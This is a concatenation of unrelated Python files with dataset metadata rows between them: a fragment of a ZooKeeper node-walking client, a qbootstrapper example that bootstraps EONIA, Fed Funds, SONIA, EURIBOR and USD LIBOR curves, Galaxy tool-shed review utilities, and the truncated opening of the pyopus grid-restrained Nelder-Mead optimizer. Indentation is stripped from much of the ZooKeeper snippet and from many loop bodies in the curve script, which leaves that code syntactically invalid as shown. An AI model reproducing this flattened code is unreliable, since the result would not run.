#self.zk = KazooClient(hosts='1.1.1.3:2181,1.1.1.2:2181,1.1.1.1:2181',retry_max_delay=2000)
        # pass the retry delay (secs) through, as in the commented example above
        self.zk = KazooClient(hosts=self.hosts, retry_max_delay=secs)
try:
self.zk.start()
self.zk.add_listener(self.listener)
        except Exception,e:
            print "ERROR: failed to connect to ZooKeeper:", e
    def listener(self, state):
        if state == KazooState.LOST:
            self.zk.start()
        elif state == KazooState.SUSPENDED:
            print "*******listener saw KazooState.SUSPENDED"
        else:
            print "*******listener saw KazooState.CONNECT"
def get_child(self,paths):
aa = self.zk.get_children(paths)
return aa
def getData(self,paths):
xx = self.zk.get(paths)
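        # zk.get() returns (data, ZnodeStat); ZnodeStat field 8 is dataLength,
        # i.e. the byte size of the node's data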
return xx[1][8]
def bianli(self,rootDir):
for i in self.get_child(rootDir):
if i:
i = rootDir + "/" + i
#if self.getData(i) > 1048570:
print i,"---->",self.getData(i)
self.bianli(i)
if __name__ == "__main__":
zzk = dzk("1.1.1.1:2181",2000)
#zzk.get_child()
#zzk.getData()
zzk.bianli("/")
| apache-2.0 | -8,220,321,272,629,685,000 | 27.957447 | 99 | 0.533431 | false | 3.004415 | false | false | false |
kevindkeogh/qbootstrapper | examples.py | 1 | 32131 | #! /usr/bin/env python
# vim: set fileencoding=utf-8
'''
Testing for USD, EUR, and GBP OIS curves. Note that these curves are the same
as the NY DVC curves (in terms of instruments). Using the 30 June 2016 data
below, we achieved <1bp difference for all points on the EUR and GBP OIS
curves relative to the Numerix curve. There was a difference of 1-2 bps for
the USD OIS curve, as that curve uses Average Index swaps, which have not
been implemented. The difference is attributable to that adjustment in
instruments.
'''
import datetime
import copy
import qbootstrapper as qb
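
# To build and inspect any curve defined below, uncomment the corresponding
# calls at the bottom of this file, for example:
#
#   eonia.build()   # bootstrap the curve
#   eonia.view()    # print discount factors
#   eonia.zeros()   # print zero rates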
curve_effective = datetime.datetime(2016, 6, 30)
effective = datetime.datetime(2016, 7, 5)
# EUR OIS curve (6/30/2016 data, 6/30/2016 effective date)
eonia = qb.Curve(curve_effective)
eonia_conventions = {'fixed_length': 12,
'float_length': 12,
'fixed_basis': 'Act360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following'
}
eonia_cash = qb.LIBORInstrument(curve_effective,
-0.00293,
5,
eonia,
length_type='days',
payment_adjustment='following')
eonia_short_instruments = [(datetime.datetime(2016, 8, 5), -0.00339),
(datetime.datetime(2016, 9, 5), -0.00347),
(datetime.datetime(2016, 10, 5), -0.00357),
(datetime.datetime(2016, 11, 5), -0.00367),
(datetime.datetime(2016, 12, 5), -0.00376),
(datetime.datetime(2017, 1, 5), -0.00385),
(datetime.datetime(2017, 2, 5), -0.00394),
(datetime.datetime(2017, 3, 5), -0.00400),
(datetime.datetime(2017, 4, 5), -0.00406),
(datetime.datetime(2017, 5, 5), -0.00412),
(datetime.datetime(2017, 6, 5), -0.00418)]
eonia_instruments = [(datetime.datetime(2017, 7, 5), -0.00423),
(datetime.datetime(2018, 1, 5), -0.00449),
(datetime.datetime(2018, 7, 5), -0.00468),
(datetime.datetime(2019, 7, 5), -0.00480),
(datetime.datetime(2020, 7, 5), -0.00441),
(datetime.datetime(2021, 7, 5), -0.00364),
(datetime.datetime(2022, 7, 5), -0.00295),
(datetime.datetime(2023, 7, 5), -0.00164),
(datetime.datetime(2024, 7, 5), -0.00055),
(datetime.datetime(2025, 7, 5), 0.00055),
(datetime.datetime(2026, 7, 5), 0.00155),
(datetime.datetime(2027, 7, 5), 0.00248),
(datetime.datetime(2028, 7, 5), 0.00325),
(datetime.datetime(2031, 7, 5), 0.00505),
(datetime.datetime(2036, 7, 5), 0.00651),
(datetime.datetime(2041, 7, 5), 0.00696),
(datetime.datetime(2046, 7, 5), 0.00707),
(datetime.datetime(2051, 7, 5), 0.00718),
(datetime.datetime(2056, 7, 5), 0.00724),
(datetime.datetime(2066, 7, 5), 0.00685)]
eonia.add_instrument(eonia_cash)
for idx, (maturity, rate) in enumerate(eonia_short_instruments):
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
eonia,
fixed_basis='Act360',
fixed_length=idx + 1,
float_length=idx + 1)
eonia.add_instrument(inst)
for (maturity, rate) in eonia_instruments:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
eonia,
**eonia_conventions)
eonia.add_instrument(inst)
# USD OIS curve (6/30/2016 data, 6/30/2016 effective date)
# Note that these are synthetics; the actual swap rates for 6y+ maturities
# are average OIS + basis vs. LIBOR
fedfunds = qb.Curve(curve_effective)
fedfunds_short_conventions = {'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following'}
fedfunds_conventions = {'fixed_length': 6,
'float_length': 3,
'fixed_basis': 'Act360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following'}
fedfunds_cash = qb.LIBORInstrument(curve_effective,
0.003,
4,
fedfunds,
length_type='days',
payment_adjustment='following')
fedfunds_swap_onew = qb.OISSwapInstrument(effective,
datetime.datetime(2016, 7, 12),
0.00387,
fedfunds,
fixed_length=1,
float_length=1,
fixed_period_length='weeks',
float_period_length='weeks',
**fedfunds_short_conventions)
fedfunds_swap_twow = qb.OISSwapInstrument(effective,
datetime.datetime(2016, 7, 19),
0.00387,
fedfunds,
fixed_length=2,
float_length=2,
fixed_period_length='weeks',
float_period_length='weeks',
**fedfunds_short_conventions)
fedfunds_swap_threew = qb.OISSwapInstrument(effective,
datetime.datetime(2016, 7, 26),
0.00387,
fedfunds,
fixed_length=3,
float_length=3,
fixed_period_length='weeks',
float_period_length='weeks',
**fedfunds_short_conventions)
fedfunds_short_instruments = [(datetime.datetime(2016, 8, 5), 0.00378, 1),
(datetime.datetime(2016, 9, 5), 0.00375, 2),
(datetime.datetime(2016, 10, 5), 0.00371, 3),
(datetime.datetime(2016, 11, 5), 0.00369, 4),
(datetime.datetime(2016, 12, 5), 0.00366, 5),
(datetime.datetime(2017, 1, 5), 0.00365, 6),
(datetime.datetime(2017, 4, 5), 0.00371, 9)]
fedfunds_instruments = [(datetime.datetime(2017, 7, 5), 0.003780),
(datetime.datetime(2018, 1, 5), 0.003950),
(datetime.datetime(2018, 7, 5), 0.004220),
(datetime.datetime(2019, 7, 5), 0.004850),
(datetime.datetime(2020, 7, 5), 0.005600),
(datetime.datetime(2021, 7, 5), 0.006450),
(datetime.datetime(2022, 7, 5), 0.007350),
(datetime.datetime(2023, 7, 5), 0.008155),
(datetime.datetime(2026, 7, 5), 0.010262),
(datetime.datetime(2028, 7, 5), 0.011370),
(datetime.datetime(2031, 7, 5), 0.012585),
(datetime.datetime(2036, 7, 5), 0.013827),
(datetime.datetime(2041, 7, 5), 0.014470),
(datetime.datetime(2046, 7, 5), 0.014847),
(datetime.datetime(2056, 7, 5), 0.015047),
(datetime.datetime(2066, 7, 5), 0.014897)]
fedfunds.add_instrument(fedfunds_cash)
fedfunds.add_instrument(fedfunds_swap_onew)
fedfunds.add_instrument(fedfunds_swap_twow)
fedfunds.add_instrument(fedfunds_swap_threew)
for (maturity, rate, months) in fedfunds_short_instruments:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
fedfunds,
fixed_length=months,
float_length=months,
**fedfunds_short_conventions)
fedfunds.add_instrument(inst)
for (maturity, rate) in fedfunds_instruments:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
fedfunds,
**fedfunds_conventions)
fedfunds.add_instrument(inst)
# EUR EURIBOR 6M curve (6/30/2016 data, 6/30/2016 effective date)
euribor = qb.LIBORCurve(curve_effective, discount_curve=eonia)
effective = datetime.datetime(2016, 7, 4)
euribor_short_conventions = {'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'fixed_basis': '30E360'}
euribor_conventions = {'fixed_length': 12,
'float_length': 6,
'fixed_basis': '30E360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'rate_period': 6,
'rate_period_length': 'months'}
euribor_cash_instruments = [(1, 'weeks', -0.00371),
(2, 'weeks', -0.00370),
(1, 'months', -0.00364),
(2, 'months', -0.00321),
(3, 'months', -0.00286),
(6, 'months', -0.00179)]
euribor_fra_instruments = [(datetime.datetime(2017, 1, 4), datetime.datetime(2017, 7, 4), -0.00210),
(datetime.datetime(2017, 7, 4), datetime.datetime(2018, 1, 4), -0.00222)]
euribor_swap_instruments = [(datetime.datetime(2018, 7, 4), -0.002075),
(datetime.datetime(2019, 7, 4), -0.001979),
(datetime.datetime(2020, 7, 4), -0.001421),
(datetime.datetime(2021, 7, 4), -0.000539),
(datetime.datetime(2022, 7, 4), 0.000166),
(datetime.datetime(2023, 7, 4), 0.001454),
(datetime.datetime(2024, 7, 4), 0.002476),
(datetime.datetime(2025, 7, 4), 0.003498),
(datetime.datetime(2026, 7, 4), 0.004424),
(datetime.datetime(2027, 7, 4), 0.005268),
(datetime.datetime(2028, 7, 4), 0.005954),
(datetime.datetime(2031, 7, 4), 0.007514),
(datetime.datetime(2036, 7, 4), 0.008604),
(datetime.datetime(2041, 7, 4), 0.008824),
(datetime.datetime(2046, 7, 4), 0.008754),
(datetime.datetime(2051, 7, 4), 0.008694),
(datetime.datetime(2056, 7, 4), 0.008582),
(datetime.datetime(2061, 7, 4), 0.008281),
(datetime.datetime(2066, 7, 4), 0.008054)]
for (length, length_type, rate) in euribor_cash_instruments:
inst = qb.LIBORInstrument(effective,
rate,
length,
euribor,
length_type=length_type,
payment_adjustment='following')
euribor.add_instrument(inst)
for (start_date, end_date, rate) in euribor_fra_instruments:
inst = qb.FRAInstrumentByDates(start_date, end_date, rate, euribor)
euribor.add_instrument(inst)
for (maturity, rate) in euribor_swap_instruments:
inst = qb.LIBORSwapInstrument(effective,
maturity,
rate,
euribor,
**euribor_conventions)
euribor.add_instrument(inst)
# USD LIBOR 3M curve (6/30/2016 data)
usdlibor = qb.LIBORCurve(curve_effective, discount_curve=fedfunds)
effective = datetime.datetime(2016, 7, 5)
usdlibor_conventions = {'fixed_length': 6,
'float_length': 3,
'fixed_basis': '30360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'rate_period': 3,
'rate_period_length': 'months'}
usdlibor_cash_instruments = [(1, 'weeks', 0.004402),
(1, 'months', 0.004651),
(2, 'months', 0.005490),
(3, 'months', 0.006541)]
usdlibor_futures_instruments = [(datetime.datetime(2016, 9, 21), datetime.datetime(2016, 12, 21), 99.35562),
                                (datetime.datetime(2016, 12, 21), datetime.datetime(2017, 3, 21), 99.32671),
                                (datetime.datetime(2017, 3, 15), datetime.datetime(2017, 6, 15), 99.30839),
                                (datetime.datetime(2017, 6, 21), datetime.datetime(2017, 9, 21), 99.27554),
                                (datetime.datetime(2017, 9, 20), datetime.datetime(2017, 12, 20), 99.23812),
                                (datetime.datetime(2017, 12, 20), datetime.datetime(2018, 3, 20), 99.18614),
                                (datetime.datetime(2018, 3, 21), datetime.datetime(2018, 6, 21), 99.14960),
                                (datetime.datetime(2018, 6, 20), datetime.datetime(2018, 9, 20), 99.10847),
                                (datetime.datetime(2018, 9, 19), datetime.datetime(2018, 12, 19), 99.06277),
                                (datetime.datetime(2018, 12, 19), datetime.datetime(2019, 3, 19), 99.00748),
                                (datetime.datetime(2019, 3, 20), datetime.datetime(2019, 6, 20), 98.96757),
                                (datetime.datetime(2019, 6, 19), datetime.datetime(2019, 9, 19), 98.92307)]
usdlibor_swap_instruments = [(datetime.datetime(2020, 7, 5), 0.00898),
(datetime.datetime(2021, 7, 5), 0.00985),
(datetime.datetime(2022, 7, 5), 0.01075),
(datetime.datetime(2023, 7, 5), 0.01158),
(datetime.datetime(2024, 7, 5), 0.01241),
(datetime.datetime(2025, 7, 5), 0.01311),
(datetime.datetime(2026, 7, 5), 0.01375),
(datetime.datetime(2027, 7, 5), 0.01435),
(datetime.datetime(2028, 7, 5), 0.01487),
(datetime.datetime(2031, 7, 5), 0.01611),
(datetime.datetime(2036, 7, 5), 0.01739),
(datetime.datetime(2041, 7, 5), 0.01807),
(datetime.datetime(2046, 7, 5), 0.01846),
(datetime.datetime(2056, 7, 5), 0.01866),
(datetime.datetime(2066, 7, 5), 0.01851)]
for (length, length_type, rate) in usdlibor_cash_instruments:
inst = qb.LIBORInstrument(effective,
rate,
length,
usdlibor,
length_type=length_type,
payment_adjustment='following')
usdlibor.add_instrument(inst)
for (start_date, end_date, price) in usdlibor_futures_instruments:
inst = qb.FuturesInstrumentByDates(start_date, end_date, price, usdlibor)
usdlibor.add_instrument(inst)
for (maturity, rate) in usdlibor_swap_instruments:
inst = qb.LIBORSwapInstrument(effective,
maturity,
rate,
usdlibor,
**usdlibor_conventions)
usdlibor.add_instrument(inst)
# GBP OIS curve (6/30/2016 data, 6/30/2016 effective date)
sonia = qb.Curve(curve_effective)
sonia_short_conventions = {'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'rate_basis': 'Act365',
'fixed_basis': 'Act365',
'float_basis': 'Act365'
}
sonia_conventions = {'fixed_length': 12,
'float_length': 12,
'fixed_basis': 'Act360',
'float_basis': 'Act360',
'fixed_period_adjustment': 'following',
'float_period_adjustment': 'following',
'fixed_payment_adjustment': 'following',
'float_payment_adjustment': 'following',
'rate_basis': 'Act365',
'fixed_basis': 'Act365',
'float_basis': 'Act365'
}
sonia_cash = qb.LIBORInstrument(curve_effective,
0.004416,
1,
sonia,
length_type='days',
payment_adjustment='following')
sonia_swap_onew = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 7, 7),
0.00443,
sonia,
fixed_length=1,
float_length=1,
fixed_period_length='weeks',
float_period_length='weeks',
**sonia_short_conventions)
sonia_swap_twow = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 7, 14),
0.00448,
sonia,
fixed_length=2,
float_length=2,
fixed_period_length='weeks',
float_period_length='weeks',
**sonia_short_conventions)
sonia_swap_threew = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 7, 21),
0.004042,
sonia,
fixed_length=3,
float_length=3,
fixed_period_length='weeks',
float_period_length='weeks',
**sonia_short_conventions)
sonia_swap_onem = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 7, 29),
0.0038,
sonia,
fixed_length=1,
float_length=1,
**sonia_short_conventions)
sonia_swap_twom = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 8, 31),
0.003017,
sonia,
fixed_length=2,
float_length=2,
**sonia_short_conventions)
sonia_swap_threem = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 9, 30),
0.002653,
sonia,
fixed_length=3,
float_length=3,
**sonia_short_conventions)
sonia_swap_fourm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 10, 31),
0.002425,
sonia,
fixed_length=4,
float_length=4,
**sonia_short_conventions)
sonia_swap_fivem = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 11, 30),
0.002213,
sonia,
fixed_length=5,
float_length=5,
**sonia_short_conventions)
sonia_swap_sixm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2016, 12, 30),
0.002053,
sonia,
fixed_length=6,
float_length=6,
**sonia_short_conventions)
sonia_swap_sevenm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 1, 31),
0.001925,
sonia,
fixed_length=7,
float_length=7,
**sonia_short_conventions)
sonia_swap_eightm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 2, 28),
0.001812,
sonia,
fixed_length=8,
float_length=8,
**sonia_short_conventions)
sonia_swap_ninem = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 3, 31),
0.001716,
sonia,
fixed_length=9,
float_length=9,
**sonia_short_conventions)
sonia_swap_tenm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 4, 28),
0.00164,
sonia,
fixed_length=10,
float_length=10,
**sonia_short_conventions)
sonia_swap_elevenm = qb.OISSwapInstrument(curve_effective,
datetime.datetime(2017, 5, 31),
0.001564,
sonia,
fixed_length=11,
float_length=11,
**sonia_short_conventions)
sonia_short_swaps = [sonia_cash, sonia_swap_onew, sonia_swap_twow,
sonia_swap_threew, sonia_swap_onem, sonia_swap_twom,
sonia_swap_threem, sonia_swap_fourm, sonia_swap_fivem,
sonia_swap_sixm, sonia_swap_sevenm, sonia_swap_eightm,
sonia_swap_ninem, sonia_swap_tenm, sonia_swap_elevenm]
sonia_swap_data = [(datetime.datetime(2017, 6, 30), 0.001499),
(datetime.datetime(2017, 12, 29), 0.001223),
(datetime.datetime(2018, 6, 30), 0.001076),
(datetime.datetime(2019, 6, 30), 0.001106),
(datetime.datetime(2020, 6, 30), 0.001444),
(datetime.datetime(2021, 6, 30), 0.002058),
(datetime.datetime(2022, 6, 30), 0.00284),
(datetime.datetime(2023, 6, 30), 0.003749),
(datetime.datetime(2024, 6, 30), 0.004668),
(datetime.datetime(2025, 6, 30), 0.005532),
(datetime.datetime(2026, 6, 30), 0.006322),
(datetime.datetime(2027, 6, 30), 0.007016),
(datetime.datetime(2028, 6, 30), 0.007609),
(datetime.datetime(2031, 6, 30), 0.008891),
(datetime.datetime(2036, 6, 30), 0.009792),
(datetime.datetime(2041, 6, 30), 0.009916),
(datetime.datetime(2046, 6, 30), 0.009869),
(datetime.datetime(2056, 6, 30), 0.009242),
(datetime.datetime(2066, 6, 30), 0.009003)]
for inst in sonia_short_swaps:
sonia.add_instrument(inst)
for maturity, rate in sonia_swap_data:
sonia.add_instrument(qb.OISSwapInstrument(curve_effective,
maturity,
rate,
sonia,
**sonia_conventions))
fedfunds_short = qb.Curve(curve_effective)
fedfunds_short_short_instruments = [
fedfunds_cash,
fedfunds_swap_onew,
fedfunds_swap_twow,
fedfunds_swap_threew]
for inst in fedfunds_short_short_instruments:
new_inst = copy.deepcopy(inst)
new_inst.curve = fedfunds_short
fedfunds_short.add_instrument(new_inst)
for (maturity, rate, months) in fedfunds_short_instruments:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
fedfunds_short,
fixed_length=months,
float_length=months,
**fedfunds_short_conventions)
fedfunds_short.add_instrument(inst)
for (maturity, rate) in fedfunds_instruments[:6]:
inst = qb.OISSwapInstrument(effective,
maturity,
rate,
fedfunds_short,
**fedfunds_conventions)
fedfunds_short.add_instrument(inst)
usdlibor_short = qb.LIBORCurve(curve_effective, discount_curve=fedfunds_short)
for (length, length_type, rate) in usdlibor_cash_instruments:
inst = qb.LIBORInstrument(effective,
rate,
length,
usdlibor_short,
length_type=length_type,
payment_adjustment='following')
usdlibor_short.add_instrument(inst)
for (start_date, end_date, price) in usdlibor_futures_instruments:
inst = qb.FuturesInstrumentByDates(start_date, end_date, price, usdlibor_short)
usdlibor_short.add_instrument(inst)
for (maturity, rate) in usdlibor_swap_instruments[:2]:
inst = qb.LIBORSwapInstrument(effective,
maturity,
rate,
usdlibor_short,
**usdlibor_conventions)
usdlibor_short.add_instrument(inst)
fedfunds_libor_libor_swaps = usdlibor_swap_instruments[2:4]
fedfunds_libor_libor_swaps.extend([usdlibor_swap_instruments[6]])
fedfunds_libor_libor_swaps.extend(usdlibor_swap_instruments[8:])
fedfunds_libor = qb.SimultaneousStrippedCurve(curve_effective,
fedfunds_short,
usdlibor_short)
fedfunds_libor_swap_data = [(datetime.datetime(2022, 7, 5), 0.003400),
(datetime.datetime(2023, 7, 5), 0.003425),
(datetime.datetime(2026, 7, 5), 0.003488),
(datetime.datetime(2028, 7, 5), 0.003500),
(datetime.datetime(2031, 7, 5), 0.003525),
(datetime.datetime(2036, 7, 5), 0.003563),
(datetime.datetime(2041, 7, 5), 0.003600),
(datetime.datetime(2046, 7, 5), 0.003613),
(datetime.datetime(2056, 7, 5), 0.003613),
(datetime.datetime(2066, 7, 5), 0.003613)]
for idx, (maturity, rate) in enumerate(fedfunds_libor_swap_data):
ois_inst = qb.AverageIndexBasisSwapInstrument(effective,
maturity,
fedfunds_libor,
leg_one_spread=rate)
libor_inst = qb.LIBORSwapInstrument(effective,
fedfunds_libor_libor_swaps[idx][0],
fedfunds_libor_libor_swaps[idx][1],
usdlibor,
**usdlibor_conventions)
instrument_pair = qb.SimultaneousInstrument(ois_inst,
libor_inst,
fedfunds_libor)
fedfunds_libor.add_instrument(instrument_pair)
# eonia.build()
# eonia.view()
# eonia.zeros()
# fedfunds.build()
# fedfunds.view()
# fedfunds.zeros()
# sonia.build()
# sonia.view()
# sonia.zeros()
# euribor.build()
# euribor.view()
# euribor.zeros()
# usdlibor.build()
# usdlibor.view()
# usdlibor.zeros()
# fedfunds_libor.build()
# fedfunds_libor.discount_curve.view()
# fedfunds_libor.discount_curve.zeros()
# fedfunds_libor.projection_curve.view()
# fedfunds_libor.projection_curve.zeros()
| mit | -2,291,508,215,302,603,800 | 50.164013 | 109 | 0.431826 | false | 4.223873 | false | false | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/tool_shed/util/review_util.py | 1 | 6281 | import logging
import os
from galaxy.model.orm import and_
from galaxy.util.odict import odict
from tool_shed.util import hg_util
import tool_shed.util.shed_util_common as suc
log = logging.getLogger( __name__ )
def can_browse_repository_reviews( app, user, repository ):
"""
Determine if there are any reviews of the received repository for which the
current user has permission to browse any component reviews.
"""
if user:
for review in repository.reviews:
for component_review in review.component_reviews:
if app.security_agent.user_can_browse_component_review( app,
repository,
component_review, user ):
return True
return False
def changeset_revision_reviewed_by_user( user, repository, changeset_revision ):
"""Determine if the current changeset revision has been reviewed by the current user."""
for review in repository.reviews:
if review.changeset_revision == changeset_revision and review.user == user:
return True
return False
def get_component( app, id ):
"""Get a component from the database."""
sa_session = app.model.context.current
return sa_session.query( app.model.Component ).get( app.security.decode_id( id ) )
def get_component_review( app, id ):
"""Get a component_review from the database"""
sa_session = app.model.context.current
return sa_session.query( app.model.ComponentReview ).get( app.security.decode_id( id ) )
def get_component_by_name( app, name ):
"""Get a component from the database via a name."""
sa_session = app.model.context.current
return sa_session.query( app.model.Component ) \
.filter( app.model.Component.table.c.name==name ) \
.first()
def get_component_review_by_repository_review_id_component_id( app, repository_review_id, component_id ):
"""Get a component_review from the database via repository_review_id and component_id."""
sa_session = app.model.context.current
return sa_session.query( app.model.ComponentReview ) \
.filter( and_( app.model.ComponentReview.table.c.repository_review_id == app.security.decode_id( repository_review_id ),
app.model.ComponentReview.table.c.component_id == app.security.decode_id( component_id ) ) ) \
.first()
def get_components( app ):
sa_session = app.model.context.current
return sa_session.query( app.model.Component ) \
.order_by( app.model.Component.name ) \
.all()
def get_previous_repository_reviews( app, repository, changeset_revision ):
"""
Return an ordered dictionary of repository reviews up to and including the
received changeset revision.
"""
repo = hg_util.get_repo_for_repository( app, repository=repository, repo_path=None, create=False )
reviewed_revision_hashes = [ review.changeset_revision for review in repository.reviews ]
previous_reviews_dict = odict()
for changeset in hg_util.reversed_upper_bounded_changelog( repo, changeset_revision ):
previous_changeset_revision = str( repo.changectx( changeset ) )
if previous_changeset_revision in reviewed_revision_hashes:
previous_rev, previous_changeset_revision_label = \
hg_util.get_rev_label_from_changeset_revision( repo, previous_changeset_revision )
revision_reviews = get_reviews_by_repository_id_changeset_revision( app,
app.security.encode_id( repository.id ),
previous_changeset_revision )
previous_reviews_dict[ previous_changeset_revision ] = \
dict( changeset_revision_label=previous_changeset_revision_label,
reviews=revision_reviews )
return previous_reviews_dict
def get_review( app, id ):
"""Get a repository_review from the database via id."""
sa_session = app.model.context.current
return sa_session.query( app.model.RepositoryReview ).get( app.security.decode_id( id ) )
def get_review_by_repository_id_changeset_revision_user_id( app, repository_id, changeset_revision, user_id ):
"""
Get a repository_review from the database via repository id, changeset_revision
and user_id.
"""
sa_session = app.model.context.current
return sa_session.query( app.model.RepositoryReview ) \
.filter( and_( app.model.RepositoryReview.repository_id == app.security.decode_id( repository_id ),
app.model.RepositoryReview.changeset_revision == changeset_revision,
app.model.RepositoryReview.user_id == app.security.decode_id( user_id ) ) ) \
.first()
def get_reviews_by_repository_id_changeset_revision( app, repository_id, changeset_revision ):
"""Get all repository_reviews from the database via repository id and changeset_revision."""
sa_session = app.model.context.current
return sa_session.query( app.model.RepositoryReview ) \
.filter( and_( app.model.RepositoryReview.repository_id == app.security.decode_id( repository_id ),
app.model.RepositoryReview.changeset_revision == changeset_revision ) ) \
.all()
def has_previous_repository_reviews( app, repository, changeset_revision ):
"""
Determine if a repository has a changeset revision review prior to the
received changeset revision.
"""
repo = hg_util.get_repo_for_repository( app, repository=repository, repo_path=None, create=False )
reviewed_revision_hashes = [ review.changeset_revision for review in repository.reviews ]
for changeset in hg_util.reversed_upper_bounded_changelog( repo, changeset_revision ):
previous_changeset_revision = str( repo.changectx( changeset ) )
if previous_changeset_revision in reviewed_revision_hashes:
return True
return False
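

# Usage sketch (illustrative; 'trans' stands for the usual Galaxy transaction
# object carrying 'app' and 'user'):
#
#   if can_browse_repository_reviews( trans.app, trans.user, repository ):
#       reviews = get_reviews_by_repository_id_changeset_revision(
#           trans.app, repository_id, changeset_revision )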
| gpl-3.0 | 8,977,158,116,913,160,000 | 51.781513 | 141 | 0.640981 | false | 4.32278 | false | false | false |
blorgon9000/pyopus | pyopus/optimizer/grnm.py | 1 | 19001 | # -*- coding: UTF-8 -*-
"""
.. inheritance-diagram:: pyopus.optimizer.grnm
:parts: 1
**Unconstrained grid-restrained Nelder-Mead simplex optimizer
(PyOPUS subsystem name: GRNMOPT)**
A provably convergent version of the Nelder-Mead simplex algorithm. The
algorithm performs unconstrained optimization. Convergence is achieved by
restraining the simplex points to a gradually refined grid and by keeping the
simplex internal angles away from 0.
The algorithm was published in
.. [grnm] Bürmen Á., Puhan J., Tuma T.: Grid Restrained Nelder-Mead Algorithm.
Computational Optimization and Applications, vol. 34, pp. 359-375, 2006.
There is an error in Algorithm 2, step 5. The correct step 5 is:
If $f^{pe}<\min(f^{e}, f^1, f^2, ..., f^{n+1})$ replace $x^i$ with $x^{pe}$
where $x^{i}$ denotes the point for which $f(x^i)$ is the lowest of all points.
"""
from ..misc.debug import DbgMsgOut, DbgMsg
from base import Optimizer
from nm import NelderMead
from numpy import abs, argsort, where, round, sign, diag, sqrt, log, array, zeros, dot, ones
from numpy.linalg import qr, det
import matplotlib.pyplot as pl
__all__ = [ 'GRNelderMead' ]
class GRNelderMead(NelderMead):
"""
Unconstrained grid-restrained Nelder-Mead optimizer class
	Default values of the expansion (1.2) and shrink (0.25) coefficients are
	different from the original Nelder-Mead values. Different are also the
	default values of the relative tolerance (1e-15), and the absolute
	function (1e-15) and side length (1e-9) tolerances.
*lam* and *Lam* are the lower and upper bound on the simplex side length
with respect to the grid. The shape (side length determinant) is bounded
with respect to the grid density by *psi*.
The grid density has a continuity bound due to the finite precision of
floating point numbers. Therefore the grid begins to behave as continuous
	when its density falls below the relative (*tau_r*) and absolute (*tau_a*)
bound with respect to the grid origin.
If *originalGrid* is ``True`` the initial grid has the same density in all
directions (as in the paper). If ``False`` the initial grid density adapts
to the bounding box shape.
If *gridRestrainInitial* is ``True`` the points of the initial simplex are
restrained to the grid.
See the :class:`~pyopus.optimizer.nm.NelderMead` class for more
information.
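
	A minimal usage sketch (assumes the optimizer interface inherited from
	:class:`~pyopus.optimizer.base.Optimizer`; the cost function and the
	initial point are illustrative)::

		from pyopus.optimizer.grnm import GRNelderMead
		from numpy import array

		def f(x):
			return (x**2).sum()

		opt=GRNelderMead(f, maxiter=100000)
		opt.reset(array([1.0, 2.0]))
		opt.run()
		print opt.x, opt.f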
"""
def __init__(self, function, debug=0, fstop=None, maxiter=None,
reflect=1.0, expand=1.2, outerContract=0.5, innerContract=-0.5, shrink=0.25,
reltol=1e-15, ftol=1e-15, xtol=1e-9, simplex=None,
lam=2.0, Lam=2.0**52, psi=1e-6, tau_r=2.0**(-52), tau_a=1e-100,
originalGrid=False, gridRestrainInitial=False):
NelderMead.__init__(self, function, debug, fstop, maxiter,
reflect, expand, outerContract, innerContract, shrink,
reltol, ftol, xtol, simplex)
# Simplex
self.simplex=None
# Grid origin and scaling
self.z=None
self.Delta=None
# Side length bounds wrt. grid
self.lam=lam
self.Lam=Lam
# Simplex shape lower bound
self.psi=1e-6
# Grid continuity bound (relative and absolute)
self.tau_r=tau_r
self.tau_a=tau_a
# Create initial grid with the procedure described in the paper
self.originalGrid=originalGrid
# Grid restrain initial simplex
self.gridRestrainInitial=gridRestrainInitial
def check(self):
"""
Checks the optimization algorithm's settings and raises an exception if
something is wrong.
"""
NelderMead.check(self)
if self.lam<=0:
raise Exception, DbgMsg("GRNMOPT", "lambda should be positive.")
if self.Lam<=0:
raise Exception, DbgMsg("GRNMOPT", "Lambda should be positive.")
if self.lam>self.Lam:
raise Exception, DbgMsg("GRNMOPT", "Lambda should be greater or equal lambda.")
if self.psi<0:
raise Exception, DbgMsg("GRNMOPT", "psi should be greater or equal zero.")
if self.tau_r<0 or self.tau_a<0:
raise Exception, DbgMsg("GRNMOPT", "Relative and absolute grid continuity bounds should be positive.")
def buildGrid(self, density=10.0):
"""
Generates the intial grid density for the algorithm. The grid is
determined relative to the bounding box of initial simplex sides.
*density* specifies the number of points in every grid direction that
covers the corresponding side of the bounding box.
If any side of the bounding box has zero length, the mean of all side
lengths divided by *density* is used as grid density in the
corresponding direction.
Returns the 1-dimensional array of length *ndim* holding the grid
densities.
"""
if self.debug:
